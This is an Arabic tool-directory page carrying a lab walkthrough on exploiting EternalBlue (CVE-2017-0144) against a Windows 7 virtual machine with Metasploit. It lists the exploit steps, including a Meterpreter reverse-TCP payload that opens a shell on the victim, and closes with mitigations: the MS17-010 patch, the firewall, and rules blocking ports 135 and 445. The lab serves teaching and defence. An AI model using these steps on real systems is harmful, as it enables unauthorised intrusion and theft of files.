Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SMB-Protocol-Vulnerability_CVE-2017-0144 — دليل مختبر خطوة بخطوة يوضح استغلال EternalBlue (CVE-2017-0144) ضد بروتوكول SMB لنظام Windows 7 باستخدام Metasploit، بما في ذلك خطوات الإعداد والاستغلال والتخفيف. | Kitploit
أدوات/GitHubGitHub/luckyman2907/smb-protocol-vulnerability_cve-2017-0144
تحليل الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubluckyman2907/smb-protocol-vulnerability_cve-2017-0144

SMB-Protocol-Vulnerability_CVE-2017-0144

دليل مختبر خطوة بخطوة يوضح استغلال EternalBlue (CVE-2017-0144) ضد بروتوكول SMB لنظام Windows 7 باستخدام Metasploit، بما في ذلك خطوات الإعداد والاستغلال والتخفيف.

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

LAB: هجوم على نظام التشغيل Windows باستخدام ثغرة بروتوكول SMB.

  • 1. الوصف
  • 2. مقدمة عامة
  • 3. الإعداد
  • 4. تنفيذ الهجوم
  • 5. طرق الوقاية

1. الوصف

في هذا المختبر، سنستخدم جهازي كمبيوتر لمحاكاة هجوم يعتمد على ثغرة في بروتوكول SMB لنظام التشغيل Windows. أحد الأجهزة يعمل بنظام Kali Linux، ويلعب دور المهاجم (hacker). والآخر يلعب دور الضحية (victim). جهاز الضحية يعمل بنظام Windows 7 64 بت الذي يحتوي على ثغرة SMB. للقيام بذلك، على جهاز Kali Linux سنستخدم كود الاستغلال المسمى EternalBlue لشن الهجوم على جهاز Windows 7.

2. مقدمة عامة

Server Message Block (SMB) هو بروتوكول لمشاركة الملفات شائع جداً على منصة Windows من Microsoft. بفضل هذا البروتوكول SMB، يمكن لأجهزة Windows المتصلة ببعضها في نفس الشبكة أو في نفس المجال (Domain) مشاركة الملفات فيما بينها. حتى الآن، يُعرف SMB أيضاً باسم Common Internet File Sharing (CIFS).

EternalBlue هو كود استغلال معلوماتي، يعتمد على ثغرة في بروتوكول SMB عبر المنفذ 445. في البداية، تم تطوير EternalBlue بواسطة وكالة الأمن القومي الأمريكية (NSA). الاسم الكامل بالإنكليزية هو U.S. National Security Agency. ولكن بعد ذلك، تم تسريبه من قبل مجموعة القراصنة The Shadow Brokers في عام 2017. وفي نفس العام، وقع هجوم واسع النطاق بفيروس تشفير البيانات – برمجية الفدية (Ransomware)، استهدف أجهزة Windows من Microsoft في جميع أنحاء العالم. ومن بينها، الأكثر شهرة هو فيروس WannaCry. حتى الآن، على الرغم من أن Microsoft قد سدت هذه الثغرة عن طريق التحديث الأمني MS17-010، إلا أن عدداً كبيراً من أجهزة Windows حول العالم لا تزال تحتوي على هذه الثغرة. تم الإعلان عن هذه الثغرة في (ثغرة تنفيذ التعليمات البرمجية عن بعد في Windows SMB). هذه الثغرة خطيرة جداً وسهلة الاستغلال. الجدير بالذكر أنه لشن هجوم عبر ثغرة بروتوكول SMB، لا يحتاج المخترق إلى إرسال أو خداع الضحية لتحميل أو تشغيل أي فيروس ضار. أي أن الضحية حتى لو لم يفعل شيئاً، يمكن للمخترق بسهولة مهاجمته والاستيلاء على التحكم في جهازه دون علمه.

CVE-2017-0144

3. الإعداد

تجهيز جهازين افتراضيين يعملان على برنامج VMware Workstation:

  • جهاز افتراضي Kali Linux (جهاز المخترق) بعنوان IP: 192.168.198.140
  • جهاز افتراضي Windows 7 (جهاز الضحية) بعنوان IP: 192.168.198.143

  1. على جهاز Kali الافتراضي (المهاجم):

    • التحقق من عنوان IP: ifconfig
    • بدء تشغيل خدمة Postgresql: service postgresql start
    • التحقق من حالة الخدمة بالأمر: service postgresql status
  2. على جهاز Windows 7 الافتراضي (الضحية):

    • التحقق من عنوان IP: ipconfig
    • إيقاف جدار الحماية (Firewall)

4. تنفيذ الهجوم

  • على جهاز Kali: تسجيل الدخول إلى Metasploit باستخدام الأمر: msfconsole

  • بعد الدخول إلى Metasploit، نبحث عن الثغرات والبنود المتعلقة بـ ms17_010 باستخدام الأمر: search ms17_010

  • إضافة عنوان IP للجهاز الضحية وجهاز المهاجم
  • ضبط التحميلة (payload) للاستغلال: use 0 -> set payload windows/x64/meterpreter/reverse_tcp

  • تشغيل الاستغلال (exploit) لبدء الاستغلال
  • فتح شيل (shell) على جهاز الضحية (يتم عبر طرفية جهاز المهاجم) بعد الدخول إليه

=> هنا يعتبر المخترق قد نجح في اختراق جهاز الضحية. في هذه المرحلة، يمكن للمخترق حذف أو سرقة الملفات من جهاز الضحية دون علمهم. بل ويمكنه أيضاً تحميل وتشغيل الفيروسات مباشرة عليه.

5. طرق الوقاية

لتجنب استغلال بروتوكول SMB والاستفادة منه، نحتاج إلى القيام ببعض الأمور التالية:

  • تفعيل جدار الحماية (Firewall).
  • تحديث Windows إلى أحدث إصدار. أو تحميل وتثبيت التصحيحات الأمنية من Microsoft، وخاصة التصحيح الأمني ms17_010.
  • حظر المنافذ 135 و 445.
    • netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"
    • netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_Cong_445"
تنزيل الأداة